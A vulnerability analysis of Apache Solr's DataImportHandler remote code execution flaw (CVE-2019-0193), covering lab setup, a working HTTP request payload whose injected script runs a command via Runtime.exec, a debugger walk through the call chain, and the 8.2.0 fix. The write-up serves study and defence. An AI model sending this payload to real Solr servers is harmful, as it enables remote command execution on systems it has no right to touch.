
Solr DataImportHandler RCE (CVE-2019-0193) Vulnerability Analysis

Environment Setup

First download the binary package and the source from the Apache archive. The version used here is v8.1.0.

https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0.zip

https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0-src.tgz

Start Solr with remote debugging enabled

anemone@ANEMONE-ASUS:/mnt/d/Store/document/all_my_work/solr/solr-8.1.0
$ cd server/ # must be run from the server directory
anemone@ANEMONE-ASUS:/mnt/d/Store/document/all_my_work/solr/solr-8.1.0/server
$ java "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9000" -Dsolr.solr.home="../example/example-DIH/solr/" -jar start.jar --module=http

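Open http://localhost:8983/solr/. If the admin console appears, the service started successfully.

Reproduction

Send the payload (note that tika is a core that ships with the demo; change it for other targets)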

POST /solr/tika/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 363

command=full-import&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function func(x){
java.lang.Runtime.getRuntime().exec("calc");
}
]]></script>
<document>
<entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:func" />
</document>
</dataConfig>

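If the calculator pops up, the payload worked.

Vulnerability Analysis

Background

dataimport

First, a look at /solr/{core}/dataimport. This API imports data into Solr, either in full or incrementally. The DataImportHandler documentation covers it in more detail.

The fields the payload needs are: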

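  • dataSource: the data source. It comes in the following types, each with its own attributes
    • JdbcDataSource: a database source
    • URLDataSource: usually paired with XPathEntityProcessor; it can fetch text data over file://, http://, ftp:// and similar protocols
    • HttpDataSource: the same as URLDataSource, only under a different name
    • FileDataSource: reads the data from a file on disk
    • FieldReaderDataSource: for fields that contain XML; can be paired with XPathEntityProcessor
    • ContentStreamDataSource: uses the POST data as the data source; works with any EntityProcessor
  • Entity: an entity, roughly the data produced from the data source wrapped as a Java object whose properties correspond to fields. On top of the default attributes, an entity for an xml/http data source can have the following:
    • url (required): the URL used to call the REST API (can be templated). If the data source is a file, this must be the file location
    • processor (required): the value must be "XPathEntityProcessor"
    • forEach (required): the XPath expression that delimits records. If there are several record types, separate them with "|" (pipe). Can be omitted if useSolrAddSchema is set to 'true'
    • stream (optional): set this to true if the XML is very large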

ScriptTransformer

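Turning data-source rows into entities involves a transform step, and the dataConfig can express that transform logic in JavaScript, as in this example from the official documentation: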

<dataConfig>
<script><![CDATA[
function f1(row) {
row.put('message', 'Hello World!');
return row;
}
]]></script>
<document>
<entity name="e" pk="id" transformer="script:f1" query="select * from X">
....
</entity>
</document>
</dataConfig>

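This is also the sink for this RCE.

Nashorn parsing

The <script> tag defines a JavaScript script, which is evaluated by Nashorn behind the scenes. Specifically, the script can use JavaScript syntax to reference Java objects, for example: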

var MyJavaClass = Java.type('my.package.MyJavaClass');

var result = MyJavaClass.sayHello('Nashorn');
print(result);

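Static analysis: finding the entry point

First grab the source for the matching version (https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0-src.tgz)

To find the entry point for /solr/{core}/dataimport, look at the filter in server/solr-webapp/webapp/WEB-INF/web.xml: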

<!-- Any path (name) registered in solrconfig.xml will be sent to that filter -->
<filter>
<filter-name>SolrRequestFilter</filter-name>
<filter-class>org.apache.solr.servlet.SolrDispatchFilter</filter-class>
<!--
Exclude patterns is a list of directories that would be short circuited by the
SolrDispatchFilter. It includes all Admin UI related static content.
NOTE: It is NOT a pattern but only matches the start of the HTTP ServletPath.
-->
<init-param>
<param-name>excludePatterns</param-name>
<param-value>/partials/.+,/libs/.+,/css/.+,/js/.+,/img/.+,/templates/.+</param-value>
</init-param>
</filter>

<filter-mapping>
<filter-name>SolrRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
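
The comment in the filter definition says that the exclude patterns only match the start of the servlet path. A minimal sketch of such a check, assuming the comma-separated value is compiled into regular expressions and tested with Matcher#lookingAt(). The class and method names are hypothetical and this is not Solr's own code:

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

class ExcludePatternSketch {
    // Compile the comma-separated init-param value into regex patterns.
    static List<Pattern> compile(String paramValue) {
        List<Pattern> patterns = new ArrayList<>();
        for (String element : paramValue.split(",")) {
            patterns.add(Pattern.compile(element.trim()));
        }
        return patterns;
    }

    // A path is excluded when any pattern matches a prefix of it
    // (lookingAt anchors at the start but not at the end).
    static boolean isExcluded(List<Pattern> patterns, String servletPath) {
        for (Pattern p : patterns) {
            if (p.matcher(servletPath).lookingAt()) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        List<Pattern> patterns = compile(
            "/partials/.+,/libs/.+,/css/.+,/js/.+,/img/.+,/templates/.+");
        // Static admin UI content is short-circuited.
        System.out.println(isExcluded(patterns, "/css/main.css"));
        // A core handler path is not, so it goes on to the dispatch logic.
        System.out.println(isExcluded(patterns, "/tika/dataimport"));
    }
}
```

Under this assumption a path such as /tika/dataimport matches none of the patterns, so the request is not short-circuited and reaches the rest of the filter.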

Every URL is handled by org.apache.solr.servlet.SolrDispatchFilter, so we look at the doFilter() method of that class:

public void doFilter(ServletRequest _request, ServletResponse _response, FilterChain chain, boolean retry) throws IOException, ServletException {
if (!(_request instanceof HttpServletRequest)) return;
HttpServletRequest request = closeShield((HttpServletRequest)_request, retry);
HttpServletResponse response = closeShield((HttpServletResponse)_response, retry);

try {
if (cores == null || cores.isShutDown()) {/*...*/}
// No need to even create the HttpSolrCall object if this path is excluded.
if (excludePatterns != null) {/*...*/}
AtomicReference<HttpServletRequest> wrappedRequest = new AtomicReference<>();
// the response and status code have already been sent
if (!authenticateRequest(request, response, wrappedRequest)) {return;}
if (wrappedRequest.get() != null) {/*...*/}
// Authentication
if (cores.getAuthenticationPlugin() != null) {/*...*/}
// Entry
HttpSolrCall call = getHttpSolrCall(request, response, retry);
ExecutorUtil.setServerThreadFlag(Boolean.TRUE);
try {
Action result = call.call();
switch (result) {/*...*/}
} finally {/*...*/}
} finally {/*...*/}
}

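The key code is lines 17-20 of the listing (from getHttpSolrCall() through call.call()): it first obtains an HttpSolrCall object for the request, then calls HttpSolrCall#call() to get the result.

Next, follow into org.apache.solr.servlet.HttpSolrCall#call():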

public Action call() throws IOException {
/*...*/

if (cores == null) {/*...*/}
if (solrDispatchFilter.abortErrorMessage != null){/*...*/}

try {
init();
/*...*/
HttpServletResponse resp = response;
switch (action) {
case ADMIN:
handleAdminRequest();
return RETURN;
case REMOTEQUERY:
SolrRequestInfo.setRequestInfo(new SolrRequestInfo(req, new SolrQueryResponse()));
remoteQuery(coreUrl + path, resp);
return RETURN;
case PROCESS:
final Method reqMethod = Method.getMethod(req.getMethod());
HttpCacheHeaderUtil.setCacheControlHeader(config, resp, reqMethod);
// unless we have been explicitly told not to, do cache validation
// if we fail cache validation, execute the query
if (config.getHttpCachingConfig().isNever304() ||
!HttpCacheHeaderUtil.doCacheHeaderValidation(solrReq, req, reqMethod, resp)) {
SolrQueryResponse solrRsp = new SolrQueryResponse();
SolrRequestInfo.setRequestInfo(new SolrRequestInfo(solrReq, solrRsp));
execute(solrRsp);
/*...*/
writeResponse(solrRsp, responseWriter, reqMethod);
}
return RETURN;
default: return action;
}
} catch (Throwable ex) {
if (shouldAudit(EventType.ERROR)) {
cores.getAuditLoggerPlugin().doAudit(new AuditEvent(EventType.ERROR, ex, req));
}
sendError(ex);
// walk the the entire cause chain to search for an Error
Throwable t = ex;
while (t != null) {
if (t instanceof Error) {/*...*/}
}

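Dynamic debugging

Finding the entry point

I could not get any further by reading the code, since there is no way to tell which case is taken, so it is time for dynamic debugging. Solr was already started with JDWP above. Now download the Solr source, create a project in IDEA, add the distserver/lib directory as a library, and set breakpoints through a Remote Debug configuration.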

image-20191103160037181

After requesting the API, debugging shows that the PROCESS case is taken:

image-20191103161357607

Continue down to line 542 in the screenshot, org.apache.solr.servlet.HttpSolrCall#execute(), and step in:

protected void execute(SolrQueryResponse rsp) {
solrReq.getContext().put("webapp", req.getContextPath());
solrReq.getCore().execute(handler, solrReq, rsp);
}

It obtains the SolrCore and runs its org.apache.solr.core.SolrCore#execute() method, which calls handler.handleRequest(req,rsp) to process req:

image-20191103162039712

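handler.handleRequest(req,rsp) in turn calls org.apache.solr.handler.RequestHandlerBase#handleRequestBody(). Had static analysis reached this point, one could do what the Chamd5 researchers did: search for implementations of this class and find dataimport.DataImportHandler#handleRequestBody(). Since we are already debugging, we can simply step in.

At this point we have finally found the entry point that handles the request.

Call stack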

public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp)
throws Exception {
rsp.setHttpCaching(false);

// TODO: figure out why just the first one is OK...
// ...
SolrParams params = req.getParams();
NamedList defaultParams = (NamedList) initArgs.get("defaults");
RequestInfo requestParams = new RequestInfo(req, getParamsMap(params), contentStream);
String command = requestParams.getCommand();
if (DataImporter.SHOW_CONF_CMD.equals(command)) {/*...*/}

if (command != null && DataImporter.ABORT_CMD.equals(command)) {
importer.runCmd(requestParams, null);
} else if (importer.isBusy()) {/*...*/
} else if (command != null) {
// RCE
if (DataImporter.FULL_IMPORT_CMD.equals(command)
|| DataImporter.DELTA_IMPORT_CMD.equals(command) ||
IMPORT_CMD.equals(command)) {
importer.maybeReloadConfiguration(requestParams, defaultParams);
// obtain a SolrWriter
DIHWriter sw = getSolrWriter(processor, loader, requestParams, req);

if (requestParams.isDebug()) {
if (debugEnabled) {
// Synchronous request for the debug mode
importer.runCmd(requestParams, sw);
//...
} else {/*...*/}
} else {
// Asynchronous request for normal mode
if(requestParams.getContentStream() == null && !requestParams.isSyncMode()){
importer.runAsync(requestParams, sw);
} else {
importer.runCmd(requestParams, sw);
}
}
} else if (DataImporter.RELOAD_CONF_CMD.equals(command)) {/*...*/}
}
rsp.add("status", importer.isBusy() ? "busy" : "idle");
rsp.add("importResponse", message);
rsp.add("statusMessages", importer.getStatusMessages());
}

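The request parameters are extracted first. The key part is lines 18-39 of the listing: in debug mode (requestParams.isDebug()) the importer runs synchronously; otherwise it runs asynchronously, unless the request carries a content stream or asks for sync mode. To make debugging easier, add a debug=true parameter to the payload and follow the synchronous branch: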

image-20191103165424861
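
The branch structure of the listing can be condensed into a small decision function. This is only a sketch: ImportModeSketch, Mode and choose() are hypothetical names, and the branch for "debug requested but not enabled" is elided in the listing, so it is modelled here as NOT_RUN purely as an assumption.

```java
class ImportModeSketch {
    enum Mode { SYNC, ASYNC, NOT_RUN }

    // Mirrors the if/else nesting shown in handleRequestBody().
    static Mode choose(boolean debugRequested, boolean debugEnabled,
                       boolean hasContentStream, boolean syncMode) {
        if (debugRequested) {
            // Debug requests call runCmd() directly, i.e. synchronously.
            // The else branch is elided in the listing; NOT_RUN is an assumption.
            return debugEnabled ? Mode.SYNC : Mode.NOT_RUN;
        }
        // Normal mode: async only without a content stream and without sync mode.
        if (!hasContentStream && !syncMode) {
            return Mode.ASYNC;
        }
        return Mode.SYNC;
    }

    public static void main(String[] args) {
        // The payload as sent in the reproduction section: no debug flag.
        System.out.println(choose(false, true, false, false));
        // The same payload with debug=true added for easier stepping.
        System.out.println(choose(true, true, false, false));
    }
}
```

Both paths end up running the import; debug=true only changes which thread the breakpoints are hit on.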

Stepping further, DataImporter#runCmd() calls DataImporter#doFullImport(), because our parameter is command=full-import:

public void doFullImport(DIHWriter writer, RequestInfo requestParams) {
log.info("Starting Full Import");
setStatus(Status.RUNNING_FULL_DUMP);
try {
DIHProperties dihPropWriter = createPropertyWriter();
setIndexStartTime(dihPropWriter.getCurrentTimestamp());
docBuilder = new DocBuilder(this, writer, dihPropWriter, requestParams);
checkWritablePersistFile(writer, dihPropWriter);
docBuilder.execute();
if (!requestParams.isDebug())
cumulativeStatistics.add(docBuilder.importStatistics);
} catch (Exception e) {/*...*/}
}

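At this point it is easy to guess that the problem is on line 9 of the listing, docBuilder.execute(). We control the imported dataConfig, the config can contain a custom JavaScript script, and a script evaluated by Nashorn can call into Java and run commands. Together these cause the vulnerability.

To finish the call stack: the sink is line 87 of ScriptTransformer#initEngine(), the call to ScriptEngine#eval(String).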

org.apache.solr.handler.dataimport.DocBuilder#doFullDump
DocBuilder#buildDocument(VariableResolver, DocWrapper, Map<String,Object>, EntityProcessorWrapper, boolean, ContextImpl)
DocBuilder#buildDocument(VariableResolver, DocWrapper, Map<String,Object>, EntityProcessorWrapper, boolean, ContextImpl, List<EntityProcessorWrapper>):L476
EntityProcessorWrapper#nextRow:L280
EntityProcessorWrapper#loadTransformers // note lines 100-111 in here: if a script transformer is found, a transformer that evaluates the JS is added to transformers
EntityProcessorWrapper#applyTransformer:L222
ScriptTransformer#transformRow:L52
ScriptTransformer#initEngine:L87
ScriptEngine#eval(String) // the string here is the content of the earlier <script>
javax.script.Invocable#invokeFunction // this calls the previously defined func, producing the RCE
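
The loadTransformers step in the stack above decides whether an entity gets a script transformer by looking at its transformer attribute. A minimal sketch of that idea, assuming the attribute is a comma-separated list in which entries starting with script: name a function from the <script> block. TransformerAttributeSketch and scriptFunctions() are hypothetical names, not Solr's:

```java
import java.util.ArrayList;
import java.util.List;

class TransformerAttributeSketch {
    static final String SCRIPT_PREFIX = "script:";

    // Returns the script function names referenced by a transformer attribute.
    static List<String> scriptFunctions(String transformerAttr) {
        List<String> functions = new ArrayList<>();
        if (transformerAttr == null) {
            return functions;
        }
        for (String part : transformerAttr.split(",")) {
            String name = part.trim();
            if (name.startsWith(SCRIPT_PREFIX)) {
                // Everything after the prefix is the function to invoke per row.
                functions.add(name.substring(SCRIPT_PREFIX.length()));
            }
        }
        return functions;
    }

    public static void main(String[] args) {
        // The attribute value used by the payload in this article.
        System.out.println(scriptFunctions("script:func"));
        // Entries without the prefix are ordinary transformer class names.
        System.out.println(scriptFunctions("RegexTransformer, script:f1"));
    }
}
```

This is why the payload needs both halves: the <script> block supplies the code, and transformer="script:func" is what causes it to be loaded and called.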

Note that RCE can be achieved directly at ScriptEngine#eval(String), by replacing the script with the following:

<script><![CDATA[java.lang.Runtime.getRuntime().exec("calc");]]></script>

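However, this produces an error in the program log because invokeFunction cannot find the function, so this article sticks with the payload that defines a function.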
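
The difference between the two script shapes can be reproduced with a harmless script through the standard javax.script API. This is a sketch under assumptions: EvalThenInvokeSketch and run() are hypothetical names, and it needs a JavaScript engine on the classpath (Nashorn ships with JDK 8-14; on newer JDKs without one it reports "no-engine").

```java
import javax.script.Invocable;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

class EvalThenInvokeSketch {
    // Evaluates the script, then tries to invoke the named function,
    // the same two steps as the end of the call stack above.
    static String run(String script, String functionName) {
        ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
        if (engine == null) {
            return "no-engine"; // no JavaScript engine installed in this JDK
        }
        try {
            engine.eval(script); // top-level statements already execute here
            ((Invocable) engine).invokeFunction(functionName, "row");
            return "invoked";
        } catch (NoSuchMethodException e) {
            // The script ran, but there is no function with that name to call.
            return "eval-only";
        } catch (ScriptException e) {
            return "script-error";
        }
    }

    public static void main(String[] args) {
        // A script that defines the function named in transformer="script:f".
        System.out.println(run("function f(row) { return row; }", "f"));
        // A script with only top-level statements and no function f.
        System.out.println(run("var x = 1;", "f"));
    }
}
```

With an engine present, the second call is the case described above: eval() has already run the top-level code, and the failed function lookup is what shows up as an error afterwards.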

Affected versions and fix

This vulnerability affects Solr <= 8.1.1. Comparing against 8.2.0 shows the fix:

image-20191103202031725

That is, the dataConfig parameter can only be used when dataConfigParam_enabled is true, which can be set in the configuration or on the startup command line with -Denable.dih.dataConfigParam=true

image-20191103202135491
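
The idea behind the fix can be sketched as a gate in front of the request-supplied config. This is not the actual patch: DataConfigParamGateSketch and resolveConfig() are hypothetical, and how a rejected request is reported (here an IllegalStateException) is an assumption. Only the system property name comes from the text above.

```java
class DataConfigParamGateSketch {
    static final String ENABLE_PROP = "enable.dih.dataConfigParam";

    // Returns the config to load: the request-supplied one only when the
    // system property is set to true, otherwise the one configured on disk.
    static String resolveConfig(String requestDataConfig, String configFromDisk) {
        // Boolean.getBoolean reads the system property and parses it as a boolean.
        boolean enabled = Boolean.getBoolean(ENABLE_PROP);
        if (requestDataConfig != null && !requestDataConfig.isEmpty()) {
            if (!enabled) {
                // Assumed behaviour: refuse instead of silently ignoring.
                throw new IllegalStateException(
                    "dataConfig parameter requires -D" + ENABLE_PROP + "=true");
            }
            return requestDataConfig;
        }
        return configFromDisk;
    }

    public static void main(String[] args) {
        System.out.println(resolveConfig(null, "<dataConfig/>"));
        try {
            resolveConfig("<dataConfig><script/></dataConfig>", "<dataConfig/>");
        } catch (IllegalStateException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

With the gate closed by default, the payload's dataConfig never reaches the script transformer unless an administrator has opted in explicitly.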

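Summary

This bug dates from August, and I only now found time to look at it. The vulnerability itself is not complicated, but the techniques of attaching a debugger and locating a Java web entry point are worth learning.

Related links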